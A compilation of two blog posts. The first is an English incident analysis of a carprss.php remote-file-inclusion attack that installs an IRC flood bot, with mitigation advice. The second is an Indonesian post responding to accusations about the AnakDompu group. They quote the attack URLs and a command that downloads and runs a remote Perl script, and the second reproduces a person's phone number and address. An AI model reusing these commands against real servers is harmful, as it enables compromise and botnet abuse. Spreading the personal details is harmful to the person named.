Found carprss.php Exploit

Since 29 February, this blog was hit by 400+ attempts to compromize the server and install an IRC bot. There is a new exploit of SiteBuilder in the wild. Hits came from the following compromized hosts:

# awk '{ print $1 }' 

Bad hits look like:

GET /tag//files/carprss.php?CarpPath=http://216.191.16.12/ \
    .shell/site/iyes.txt??

I downloaded the file iyest.txt, it’s a PHP script which contains lot of lines such:

@passthru('cd /tmp;wget http://216.191.16.12/.shell/site/ \
    hai.txt;perl hai.txt;rm -f hai.txt*');

This IP address belongs to AllStream, a Canadian Internet provider.
After a successful download via the URL above, the code is parsed and executed by carprss.php. I downloaded hai.txt. It’s a Perl script which performs several tasks:

#!/usr/bin/perl
#
########################################################
# Ketika Rasa Tak Dapat Di Ungkap Dengan Kata
#       Anak
#       _____
#      ( ___ )  _____  __  ___  ____  _   _
#      | |  \ \(  _  )(  \/   )( _  )( ) ( )
# _\\\\|_|_ _|_)_(_)_||_\__/|_||_|)_||_|_|_|_\ AnakDompu
#  ////| |   | ) | | || |\/ | || ___)| | | | /  crew
#      | |__/ /| (_) || |   | || |   | |_| |
#      (_____) (_____)(_)   (_)(_)   (_____)
#
#              AnakDompu [on] Dalnet © 2008
#
#
########################################################

It set up an IRC bot which try to connect to 61.246.177.225:65500 and join channel #d0s:

# telnet 61.246.177.225 65500
Trying 61.246.177.225...
Connected to 61.246.177.225.
Escape character is '^]'.
:irc.Indonesia.B0tN3t.org NOTICE AUTH :*** Looking up your hostname...
:irc.Indonesia.B0tN3t.org NOTICE AUTH :*** Found your hostname

This IP address belongs to AirTel, an Internet provider in New-Delhi.

The bot understands the following commands: “user”, “restart”, “mail”, “safe”, “inbox”, “conback”, “dns”, “info”, “vunl”, “bot”, “uname”, “rndnick”, “raw”, “eval”, “sexec”, “exec”, “passthru”, “popen”, “system”, “pscan”, “ud.server”, “download”, “die”, “logout”, “udpflood”, “tcpflood”.

How to avoid this kind of attack? First, run patched software! But how to prevent them?

• Do not run public servers with administrative right (root).
• Run the servers in a chroot’d environment.
• Do not allow outgoing to unusual ports (65500 in this case).
• Use ACL systems to prevent the servers to executre or access to unusual files or directories. [1]
• Run an selinux on Linux or systrace on *BSD.

  I do not publish the scripts here but I kept a copy of them. Ask me if you need to have a look at it “for study only”. If you have more information, let share them!

Source From : http://blog.rootshell.be

AnakDompu Apaan Seh?

On 5/12/08, Micha** **** **** wrote:

Micha** **** **** wrote:
>
> Dear Mr. P*****A a.k.a Black_Claw a.k.a blaxnux,
> we would like to ask you a few details, about a group
> known as “AnakDompu”, which is somehow related to you.
> As you can also find in google, “AnakDompu” crew are
> are famous for web attacking most of russia and china site for
> past 6 months,including goverment sites. We are not
> judging since it is still unclear about it yet since
> the attacker IP seems diffrent from yours, but it is
> no doubt that the nick that you use are cleary seen
> on the hacked page. It maybe just a same handle, but
> during research, we also found that a few words also
> lead us to you. We hope that this is just a
> missunderstanding and we wait for your reply.
>
>
> Sincerely,
> Micha** **** ****

Loh, ada apa ini? Perasaan saya pernah denger masalah AnakDompu ini tapi dimana ya? Setahu saya hal yang berkaitan dengan AnakDompu ini adalah akun wotpres Rhakateza disaspen kemarin. Maka saya googling sajalah, dan saya menemukan ini :

Korespondensi Perusahaan
Nama: Tn. Furkan [Direktur/CEO/Manajer Umum]
E-mail:
Situs Web: http://anakdompu.blogspot.com
Pesan Instan

Nomer Telpon: 081804297445
Nomer Faks: —
Alamat: Jln. Merpati no 47 Dompu NTB
Dompu, Nusa Tenggara Barat
Indonesia

Sifat Dasar Usaha Jasa dari kategori Komputer & Software

Penjelasan Ringkas

AnakDompu merupakan Nama Sebuah Komunitas Yang Berasal Dari Dompu Nusa Tenggara Barat
AnakDompu Bergerak Dalam Bidang Teknologi Informasi. Merupakan Suatu Komunitas Yang di dalamnya terdapat Berbagai macam Suku Dan KOmunitas yang terpentuk Dengan Nama AnakDompu

Lah, ini sejak kapan si Ukang bikin perusahaan? Direktur pulak! Lah, tapi masak ini penyebabnya itu imel nowel-nowel saya. Kan tidak masuk akal. Tapi kemudian saya nemu yang ini :

http://cgaprogram.com/images/dompucrew.html

#AnakDompu @Dalnet 2008

AnakDompu

Greets

Shinchi, Black_Claw, silverx, Rhakateza, ab-enk, onny, [E]mine[M], Artexdabox , JaLi-, O_L_O, Slack-ware, jok3rsmd, H4ntu_Cyber, BeRgUnDaL, And All AnakDompu Crew

Special Thank’s to :

All Crew Chan : #AnakBatam, #sysHACK, #powHACK, #CR@CKER, #e-c-h-o, #yogyafree, #becak, #kuburan, #24jam, #jepang, #0-9

Kemudian yang ini :

http://www.matchent.com/wpress/?q=node/267

A bit better regarding the file cmd.txt which got a score of 11/32.
ClamAV calls this one PHP.Shell
I found one little piece of code in one of the files:
echo “AnakDompu“;
Which apparently leads to some Indonesian guys.
So I am a bit in doubt about who these guys are; Albanians, Russians, Turks or Indonesians?
AnakDompu gives some hits to pages apparently related to hacking, e.g. http://shinchi.wordpress.com/ , http://samada.wordpress.com/ , http://anakdompu.blogspot.com/ and http://anakdompu.wordpress.com/. And irc-channels on IndoIRC and DALnet.
l33t scriptkiddies who ruin other sites for fun? I think those days are over and most attacks nowadays are economically motivated.
It’s a dangerous world.

WTF! UKANG!!! Lah apa yang saya ajarkan dulu memangnya? Saya kira setelah nick Shinchi berhenti ngejar target nama di zone H semuanya sudah usai. Ternyata kok masih sama saja.
Lah macam ini seh malah menjelekkan nama daerah bapakmu namanya ndul. Cobak itu diselami kata-kata tuduhannya: “l33t scriptkiddies who ruin other sites for fun?” - “anak kecil nyekrip l33t yang menghancurkan situs demi kesenangan?”, dan lebih dari itu, saya dimasukkan dalam kategori tersebut karna saya “some Indonesian guys”? Aduhai, mohon maaf, sepertinya sudah lebih dari semilenium saya ninggalin yang namanya operasi plastik muka orang terus ditempelin nama saya buat senang-senang doang.

Saya memang nggak suci-suci amat dan ilmu saya jauh dibawah orang lain, tapi mbok ya setidaknya yang seperti itu tidak usah terlalu diumbarlah. Sudah cukup kegiatan corat-coret ini. Kalau kayak begini ya sampek hari kiamat juga yang kamu tau cuman RFI, LFI, sama EsKiEl. Kapan dewasanya? Masih banyak cara untuk mengangkat nama -atau mungkin di kasus kamu nama daerah- dengan cara yang lebih keren. Aktif di pengembangan opensors misalnya. Cobak walaupun kamu sama Ivan masih nguliah di jogja, bantulah saya gimana caranya supaya rotsow bisa kejadian di Dompu kek.

Tidak heran blog kamu disuspen, beserta semua yang lain yang ada di wotpres. Makanya baca itu TOA, nak. Baru kali ini saya melihat ada orang yang tega-teganya makek wotpres gretong untuk Remot Fail Inklusyen :

claroline/inc/claro_init_header.
inc.php?includePath=http://anakdompu.files.wordpress.com/2008/03/special.txt?

Ah, tapi kadang lucu juga melihatnya. Dompu, sebuah tempat fakir benwit yang bahkan nggak masuk di peta, yang dipandang rendah bahkan oleh kabupaten lain yang se-propinsi, bisa wira-wiri di kancah benwit kelas berat, dan parahnya, untuk bidang yang kurang baik pula…

Saya sering melihat langit Dompu dikala malam, jika tidak ada awan, jika langit tidak ditutupi apapun. Saya bisa melihat bintang. Saya bisa melihat horison. Saya kadang bahkan bisa menangkap kabut galaksi. Hal-hal yang sangat susah ditemui di langit di pulau Jawa. Membuat jika saya menyiulkan konserto eyecatch dari One More Time, One More Chance nya Byousoku 5cm, serasa daun mangga berubah menjadi kelopak bunga sakura yang jatuh bagaikan salju dengan kecepatan 5 sentimeter per detik…

Jadi kenapa harus memperburuk nama daerah yang bernaung dibawah langit seindah itu?

Source from : http://blackclaw.wordpress.com